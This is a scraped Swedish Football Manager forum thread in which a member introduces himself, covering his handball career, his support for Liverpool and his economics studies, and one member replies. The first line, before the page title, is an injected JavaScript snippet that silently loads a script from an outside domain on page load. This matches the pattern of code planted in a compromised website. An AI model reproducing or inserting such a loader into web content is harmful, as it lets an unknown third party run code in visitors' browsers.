;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); gurkburk – Hej forumet! – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

gurkburk

2 Inlägg
2 Users
6 Likes
297 Visningar
gurkburk
(@gurkburk)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 23
Topic starter  

Hoppar väl på tåget såhär i nytt-forum-tider. Är väl en av den yngre här på forumet trots mina 10 år på sidan. Hela 23 år fyllda nu och det var julen 2008 som första FM-spelet dök upp i en av klapparna och FM-nörden var född. FM-suget har dalat lite denna sommar men lär ju komma tillbaka så fort skolan börjar igen. 

Uppvuxen i lilla skeeethålan Lindesberg utanför Örebro där handbollen är 100 gånger större än fotbollen. Därmed så blev det en elitsatsning inom den sporten istället. 2013 så blev det därmed handbollsgymnasium och spel i IFK Skövde men gjorde min sista match i januari 2016 då axeln sa nej. 

Fotbollsintresset har alltid funnits där och det är främst Premier League och Liverpool som gäller. Den inhemska fotbollen tilltalar mig tyvärr inte.. Får hoppas att det kan få sig en ändring efter plugget då det förmodligen blir flytt "hem" till Örebro. 

Idag återfinns jag istället i Jönköping där jag pluggat 2 av 4 år på civilekonomprogrammet. Skulle ha gjort en utbytestermin i Nottingham denna höst men blev kvar här i Småland pga corona.... 

 


   
Citera
Gabriel-J
(@gabriel-j)
Active Member
Blev medlem: 4 år sedan
Inlägg: 12
 

Härligt med Liverpool intresset. 
Surt att inte få åka över till England för dig bara!


   
SvaraCitera
Share: